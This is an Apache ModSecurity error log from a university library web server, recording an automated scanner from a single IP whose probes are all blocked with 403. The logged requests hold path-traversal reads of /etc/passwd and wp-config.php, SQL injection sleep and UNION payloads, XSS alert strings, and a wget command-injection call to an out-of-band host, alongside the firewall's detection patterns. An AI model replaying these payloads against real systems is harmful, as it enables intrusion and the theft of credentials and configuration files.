[Tue Aug 29 11:48:31.784431 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAjdQR0AAAAZ"]
[Tue Aug 29 11:48:32.367372 2023] [:error] [pid 2385] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAlRkF4AAAAx"]
[Tue Aug 29 11:48:33.431580 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAk1w6oAAAAY"]
[Tue Aug 29 11:48:35.354550 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAk2KW0AAAAb"]
[Tue Aug 29 11:48:35.358681 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAkoTkEAAAAH"]
[Tue Aug 29 11:48:37.362701 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAk1w60AAAAY"]
[Tue Aug 29 11:48:37.415468 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAlUleEAAAA0"]
[Tue Aug 29 11:48:38.403702 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAkwQSMAAAAS"]
[Tue Aug 29 11:48:40.415882 2023] [:error] [pid 2381] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAlNqsAAAAAt"]
[Tue Aug 29 11:48:43.405680 2023] [:error] [pid 2413] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAltVYQAAAAR"]
[Tue Aug 29 11:48:43.432319 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAkksOwAAAAA"]
[Tue Aug 29 11:48:47.351256 2023] [:error] [pid 2428] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAl8pP0AAAAm"]
[Tue Aug 29 11:48:49.374597 2023] [:error] [pid 2428] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAl8pQAAAAAm"]
[Tue Aug 29 11:48:49.391301 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAkle04AAAAD"]
[Tue Aug 29 11:48:49.423514 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAkyx-QAAAAW"]
[Tue Aug 29 11:48:50.384517 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAlQ3r0AAAAw"]
[Tue Aug 29 11:48:51.398493 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAkwQTMAAAAS"]
[Tue Aug 29 11:48:52.428332 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAkGCZIAAAAE"]
[Tue Aug 29 11:48:53.392107 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAkyx-wAAAAW"]
[Tue Aug 29 11:48:54.434270 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAk1w8gAAAAY"]
[Tue Aug 29 11:48:55.410202 2023] [:error] [pid 2382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAlOZJ8AAAAu"]
[Tue Aug 29 11:48:55.471305 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14t8Co-f0AAAlV8CgAAAA1"]
[Tue Aug 29 11:48:56.376834 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAmIbKcAAAAo"]
[Tue Aug 29 11:48:57.439014 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAlIBaYAAAAn"]
[Tue Aug 29 11:48:57.446513 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAkyyAAAAAAW"]
[Tue Aug 29 11:48:57.451310 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAk7QLsAAAAi"]
[Tue Aug 29 11:48:58.374637 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14usCo-f0AAAlUlf8AAAA0"]
[Tue Aug 29 11:49:02.369401 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gwb84dimbwsgoj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAk5CgsAAAAg"]
[Tue Aug 29 11:49:04.435540 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAk1w9YAAAAY"]
[Tue Aug 29 11:49:05.409738 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAfWN90AAAAL"]
[Tue Aug 29 11:49:08.456998 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibft.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAlV8EMAAAA1"]
